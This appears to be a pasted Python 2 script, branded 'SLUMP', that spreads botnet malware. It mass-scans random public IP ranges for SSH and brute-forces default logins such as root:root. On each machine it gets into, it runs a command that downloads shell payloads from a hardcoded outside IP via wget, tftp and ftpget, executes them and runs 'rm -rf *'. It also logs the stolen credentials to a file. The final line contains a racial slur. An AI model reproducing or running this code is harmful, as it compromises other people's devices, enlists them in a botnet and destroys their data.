# python scan.py 1000 <start-range> <end-range> <<USAGE# -*- coding: utf-8 -*-

1. # python scan.py 1000 <start-range> <end-range> <<USAGE
2. # -*- coding: utf-8 -*-
3.  
4.  
5. import threading, paramiko, random, socket, time, sys
6.  
7. paramiko.util.log_to_file("/dev/null")
8.  
9. blacklisted = ["127.0","10.0","192.168"]
10.  
11. #server_ip = useless atm
12.  
13. passwords = ["support:support"]
14.  
15. if sys.argv[4] == "root":
16. passwords = ["root:root"]
17. if sys.argv[4] == "guest":
18. passwords = ["guest:guest"]
19. if sys.argv[4] == "telnet":
20. passwords = ["telnet:telnet"]
21.  
22. if len(sys.argv) < 4:
23. sys.exit("Usage: python " + sys.argv[0] + " <threads> <start-range> <end-range> <passwords>")
24.  
25. print "\x1b[1;36m███████╗██╗ ██╗ ██╗███╗ ███╗██████╗ \x1b[0;36m"
26. print "\x1b[1;36m██╔════╝██║ ██║ ██║████╗ ████║██╔══██╗\x1b[0;32m"
27. print "\x1b[1;36m███████╗██║ ██║ ██║██╔████╔██║██████╔╝\x1b[0;32m"
28. print "\x1b[1;36m╚════██║██║ ██║ ██║██║╚██╔╝██║██╔═══╝ \x1b[0;36m"
29. print "\x1b[1;36m███████║███████╗╚██████╔╝██║ ╚═╝ ██║██║ \x1b[0;36m"
30. print "\x1b[1;36m╚══════╝╚══════╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ \x1b[0;36m"
31.  
32. def sshscanner(ip):
33. global passwords
34. try:
35. thisipisbad='no'
36. for badip in blacklisted:
37. if badip in ip:
38. thisipisbad='yes'
39. if thisipisbad=='yes':
40. sys.exit()
41. username='root'
42. password="0"
43. port = 22
44. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
45. s.settimeout(3)
46. s.connect((ip, port))
47. data = str(s.recv(1024))
48. if "SSH" in data:
49. print("\x1b[1;37m[\x1b[1;36m-\x1b[1;37m] \x1b[1;36mTrying To Infect \x1b[1;37m-\x1b[1;36m> \x1b[1;32m" + ip + "\x1b[37m")
50. elif "ssh" in data:
51. print("\x1b[1;37m[\x1b[1;36m-\x1b[1;37m] \x1b[1;36mTrying To Infect \x1b[1;37m-\x1b[1;36m> \x1b[1;32m" + ip + "\x1b[37m")
52. else:
53. sys.exit()
54. s.close()
55. ssh = paramiko.SSHClient()
56. ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
57. dobreak=False
58. for passwd in passwords:
59. if ":n/a" in passwd:
60. password=""
61. else:
62. password=passwd.split(":")[1]
63. if "n/a:" in passwd:
64. username=""
65. else:
66. username=passwd.split(":")[0]
67. try:
68. ssh.connect(ip, port = port, username=username, password=password, timeout=3)
69. break
70. except:
71. pass
72. badserver=True
73. stdin, stdout, stderr = ssh.exec_command("/sbin/ifconfig")
74. output = stdout.read()
75. if "inet addr" in output:
76. badserver=False
77. websites = [ ]
78. if badserver == False:
79. print("\x1b[1;37m[\x1b[1;36m+\x1b[1;37m] \x1b[1;36mInfecting this Router \x1b[1;37m-\x1b[1;36m> \x1b[1;32m" + ip + ":" + username + ":" + password + "\x1b[37m")
80. ssh.exec_command('cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://191.96.112.115/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 191.96.112.115 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 191.96.112.115; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 191.96.112.115 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *')
81. vulns = open("slumpthegod.txt", "a").write(username + ":" + password + ":" + ip + "\n")
82. time.sleep(12)
83. ssh.close()
84. except Exception as e:
85. pass
86.  
87.  
88. if sys.argv[2] == "ILY":
89. ranges = ["188.16.000.000/188.19.255.255/188.20.255.255/190.13.0.0/190.13.255.255/190.40.0.0/190.43.255.255/190.96.0.0/190.97.255.255/190.232.0.0/190.239.255.255/125.27/101.109/113.53/118.173/122.170/122.180/81.20/125.25/125.26/182.52/118.174/118.175/125.24/180.180"]
90. randomrange = random.choice(ranges)
91. startrng = randomrange.split("/")[0]
92. endrng = randomrange.split("/")[1]
93.  
94. if sys.argv[2] != "ILY":
95. a = int(sys.argv[2].split(".")[0])
96. b = int(sys.argv[2].split(".")[1])
97. c = int(sys.argv[2].split(".")[2])
98. d = int(sys.argv[2].split(".")[3])
99. else:
100. a = int(startrng.split(".")[0])
101. b = int(startrng.split(".")[1])
102. c = int(startrng.split(".")[2])
103. d = int(startrng.split(".")[3])
104. x = 0
105.  
106. while(True):
107. try:
108.  
109. if sys.argv[2] != "ILY":
110. endaddr = sys.argv[3]
111. else:
112. endaddr = endrng
113.  
114. d += 1
115.  
116. ipaddr = str(a) + "." + str(b) + "."+str(c)+"."+str(d)
117.  
118. if endaddr == (ipaddr or str(a) + "." + str(b) + "."+str(c)+"."+str(d-1)):
119. if sys.argv[2] == "ILY":
120. randomrange = random.choice(ranges)
121. startrng = randomrange.split("/")[0]
122. endrng = randomrange.split("/")[1]
123. a = int(startrng.split(".")[0])
124. b = int(startrng.split(".")[1])
125. c = int(startrng.split(".")[2])
126. d = int(startrng.split(".")[3])
127. else:
128. break
129.  
130. if d > 255:
131. c += 1
132. d = 0
133.  
134. if c > 255:
135. b += 1
136. c = 0
137.  
138. if b > 255:
139. a += 1
140. b = 0
141.  
142. ipaddr = str(a) + "." + str(b) + "."+str(c)+"."+str(d)
143.  
144. if ipaddr == endaddr:
145. if sys.argv[2] == "ILY":
146. randomrange = random.choice(ranges)
147. startrng = randomrange.split("/")[0]
148. endrng = randomrange.split("/")[1]
149. a = int(startrng.split(".")[0])
150. b = int(startrng.split(".")[1])
151. c = int(startrng.split(".")[2])
152. d = int(startrng.split(".")[3])
153. else:
154. break
155.  
156. if x > 500:
157. time.sleep(1)
158. x = 0
159.  
160. t = threading.Thread(target=sshscanner, args=(ipaddr,))
161. t.start()
162.  
163. except Exception as e:
164. pass
165.  
166. print "\x1b[31mKilled my nig\x1b[37m"